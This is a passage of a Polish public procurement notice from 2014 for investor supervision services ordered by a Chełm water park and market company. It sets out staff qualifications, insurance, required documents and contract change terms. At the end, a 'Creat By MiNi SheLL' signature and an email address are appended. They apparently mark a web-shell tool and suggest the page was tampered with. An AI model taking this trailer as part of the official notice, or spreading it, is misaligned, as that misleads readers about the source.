    f) co  najmniej 1 osobą posiadającą doświadczenie w prowadzeniu spraw              administracyjno - biurowych i rozliczeń finansowych. Ocena spełniania przez Wykonawców wymienionego warunku udziału w postępowaniu będzie dokonana według formuły spełnia/nie spełnia wymagany warunek na podstawie: a) oświadczenia o spełnieniu warunków udziału w postępowaniu (załącznik nr 2 do SIWZ);
b) wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami (załącznik nr 5 do SIWZ).
Przedłożony wykaz powinien zawierać: 
                 -  co najmniej 1 koordynatora zespołu inspektorów nadzoru inwestorskiego, który 
            posiada niezbędne uprawnienia budowlane w specjalności konstrukcyjno - 
            budowlanej bez ograniczeń do kierowania robotami budowlanymi lub 
            odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie 
            wcześniej obowiązujących przepisów lub odpowiadające uprawnienia wydane 
            osobie będącej obywatelem państw Europejskiego Obszaru Gospodarczego oraz 
            Konfederacji Szwajcarskiej z zastrzeżeniem  art. 12a ustawy z dnia 7 lipca 1994 r. 
            Prawo budowlane (Dz. U. z 2013 r. poz. 1409 z późn. zm.) oraz ustawy  z dnia            
            18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych 
            w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. Nr 63, poz. 394) 
            oraz posiada minimum 3 - letnie doświadczenie w pełnieniu funkcji inspektora 
                 nadzoru inwestorskiego;
     - co najmniej 1 inspektora nadzoru inwestorskiego, który posiada niezbędne 
                 uprawnienia budowlane w specjalności drogowej bez ograniczeń do kierowania 
                 robotami budowlanymi lub odpowiadające im uprawnienia budowlane, które 
                 zostały wydane na podstawie wcześniej obowiązujących przepisów lub 
                 odpowiadające uprawnienia wydane osobie będącej obywatelem państw 
                 Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej 
                 z zastrzeżeniem  art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U.            
                 z 2013 r. poz. 1409 z późn. zm.) oraz ustawy z dnia 18 marca 2008 r. o zasadach
                 uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii 
                 Europejskiej (Dz. U. z 2008 r. Nr 63, poz. 394) oraz posiada minimum 3 - letnie 
                 doświadczenie w pełnieniu funkcji inspektora nadzoru inwestorskiego;
     - co najmniej 1 inspektora nadzoru inwestorskiego, który posiada niezbędne 
                 uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji                  
                 i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych                                    
                 i kanalizacyjnych bez ograniczeń do kierowania robotami budowlanymi lub 
                 odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie 
                 wcześniej obowiązujących przepisów lub odpowiadające uprawnienia wydane 
                 osobie będącej obywatelem państw Europejskiego Obszaru Gospodarczego oraz 
                 Konfederacji Szwajcarskiej z zastrzeżeniem  art. 12a ustawy z dnia 7 lipca 1994 r. 
                 Prawo budowlane (Dz. U. z 2013 r. poz. 1409 z późn. zm.) oraz ustawy  z dnia          
                 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych 
                 w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. Nr 63, poz. 394)     
                 oraz posiada minimum 3 - letnie doświadczenie w pełnieniu funkcji inspektora 
                 nadzoru inwestorskiego;
     - co najmniej 1 inspektora nadzoru inwestorskiego, który posiada niezbędne 
                 uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji                  
                 i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń do kierowania 
                 robotami budowlanymi lub odpowiadające im uprawnienia budowlane, które 
                 zostały wydane na podstawie wcześniej obowiązujących przepisów lub 
                 odpowiadające uprawnienia wydane osobie będącej obywatelem państw 
                 Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej 
                 z zastrzeżeniem  art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U.             
                 z 2013 r. poz. 1409 z późn. zm.) oraz ustawy z dnia 18 marca 2008 r. o zasadach
                 uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii 
                 Europejskiej (Dz. U. z 2008 r. Nr 63, poz. 394) oraz posiada minimum 3 - letnie 
                 doświadczenie w pełnieniu funkcji inspektora nadzoru inwestorskiego;
     - co najmniej 1 inspektora nadzoru inwestorskiego, który posiada niezbędne 
                 uprawnienia budowlane w specjalności telekomunikacyjnej bez ograniczeń do 
                 kierowania robotami budowlanymi lub odpowiadające im uprawnienia budowlane, 
                 które zostały wydane na podstawie wcześniej obowiązujących przepisów lub 
                 odpowiadające uprawnienia wydane osobie będącej obywatelem państw 
                 Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej 
                 z zastrzeżeniem  art. 12a ustawy dnia 7 lipca 1994 r. Prawo budowlane (Dz. U.                   
                 z 2013 r. poz. 1409 z późn. zm.) oraz ustawy z dnia 18 marca 2008 r. o zasadach
                 uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii 
                Europejskiej (Dz. U. z 2008 r. Nr 63, poz. 394) oraz posiada minimum 3 - letnie 
                doświadczenie w pełnieniu funkcji inspektora nadzoru  inwestorskiego.
                 Zamawiający dopuszcza łączenie w/w funkcji, w przypadku gdy osoba posiada 
                 jednocześnie kwalifikacje i  uprawnienia do wykonywania każdej z funkcji.
                 - co  najmniej 1 osobę posiadającą doświadczenie w prowadzeniu spraw 
                 administracyjno - biurowych i rozliczeń finansowych.
            c) oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, 
                posiadają wymagane niezbędne uprawnienia budowlane w specjalności: 
           - konstrukcyjno - budowlanej bez  ograniczeń do kierowania robotami 
             budowlanymi;
           - drogowej bez ograniczeń do kierowania robotami budowlanymi;
                - instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, 
                  gazowych, wodociągowych i kanalizacyjnych bez ograniczeń do kierowania 
                  robotami budowlanymi;
                - instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych                                
                   i elektroenergetycznych bez ograniczeń do kierowania robotami budowlanymi;
                - telekomunikacyjnej bez ograniczeń do kierowania robotami budowlanymi
          lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie
          wcześniej obowiązujących przepisów lub odpowiadające uprawnienia wydane    
          osobie  będącej obywatelem państw Europejskiego Obszaru Gospodarczego oraz    
         Konfederacji Szwajcarskiej z zastrzeżeniem  art. 12a ustawy z dnia 7 lipca 1994 r. 
         Prawo budowlane (Dz. U. z 2013 r. poz. 1409 z późn. zm.) oraz ustawy z dnia 
         18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych 
         w państwach członkowskich Unii Europejskiej (Dz. U. z 2008r. Nr 63, poz. 394) 
         (załącznik nr 6 do SIWZ).
Zamawiający przy ocenie spełniania tego warunku przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia weźmie pod uwagę łączny potencjał kadrowy Wykonawców.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek dotyczący sytuacji ekonomicznej i finansowej, w szczególności są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę co najmniej 900 000,00 zł.      Ocena spełniania przez Wykonawców wymienionego warunku udziału w postępowaniu będzie dokonana według formuły spełnia/nie spełnia wymagany warunek na podstawie: a) oświadczenia o spełnieniu warunków udziału w postępowaniu (załącznik  nr 2 do SIWZ);
b) opłaconej polisy, a w przypadku jej braku, innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności  cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę co najmniej 900 000,00 zł.
   Zamawiający przy ocenie spełniania tego warunku przez Wykonawców wspólnie             ubiegających się o udzielenie zamówienia weźmie pod uwagę łączną sytuację 
      ekonomiczną i finansową Wykonawców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach       zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów,       niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej       sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami       niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu       pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych       zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
2. Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1       ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b      ustawy, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami       innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz       oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty      dostęp do ich zasobów, żąda dokumentów dotyczących w szczególności:
      1) zakresu dostępnych Wykonawcy zasobów innego podmiotu;
      2) sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy 
          wykonywaniu zamówienia;
      3) charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem;
      4) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. 3. Wykonawca reprezentowany przez pełnomocnika, winien złożyć wraz z ofertą stosowny dokument pełnomocnictwa w oryginale (ewentualnie notarialnie poświadczoną kopię pełnomocnictwa). 4. Jeżeli najkorzystniejszą ofertę złożą Wykonawcy wspólnie ubiegający się o udzielenie zamówienia przed zawarciem umowy w sprawie zamówienia publicznego złożą umowę regulującą współpracę tych Wykonawców (art. 23 ust. 4 ustawy Prawo zamówień publicznych).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania istotnych zmian postanowień zawartej 
    umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy,                    
    w przypadku wystąpienia niżej wymienionych okoliczności z uwzględnieniem podanych 
    warunków ich wprowadzenia:                                                                                                    
    1) zmiany osobowe:
        a) zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne 
            legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami,                   
            o których mowa w SIWZ spowodowane:
            - niewywiązywaniem się z obowiązków wynikających z umowy,
            - inną przyczyną niezależną od Wykonawcy (np. rezygnacją itp.) 
            - śmiercią, chorobą lub innym zdarzeniem losowym.
        W przypadku wystąpienia w/w okoliczności zmiana osób będzie wymagała pisemnego 
        zaakceptowania przez Zamawiającego.
     2) zmiana terminu wykonania umowy spowodowana:
         a)  innymi przyczynami zewnętrznymi niezależnymi od Zamawiającego oraz 
              Wykonawcy skutkującymi niemożliwością  świadczenia usługi lub prowadzenia 
              robót budowlanych,
         b)  szczególnie niesprzyjającymi warunkami atmosferycznymi uniemożliwiającymi
               prowadzenie robót,
         c)   następstwem okoliczności leżących po stronie Zamawiającego, w szczególności 
               wstrzymanie lub zawieszenie robót przez Zamawiającego,  
         d)   zmianą terminu wykonania robót budowlanych nad którymi będzie sprawowany 
               nadzór inwestorski.                                                                                                                                            
        W przypadku wystąpienia w/w okoliczności termin wykonania umowy może ulec 
        odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonywania jej 
        przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> ptm.chelm.bip-gov.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Chełmski Park Wodny i Targowiska Miejskie Sp. z o.o., ul. Okszowska 41, 22-100 Chełm.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.06.2014 godzina 10:00, miejsce: Oferty należy składać w siedzibie Zamawiającego: Chełmski Park Wodny i Targowiska Miejskie Sp. z o.o., ul. Okszowska 41, 22-100 Chełm, sekretariat, lub za pośrednictwem poczty.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com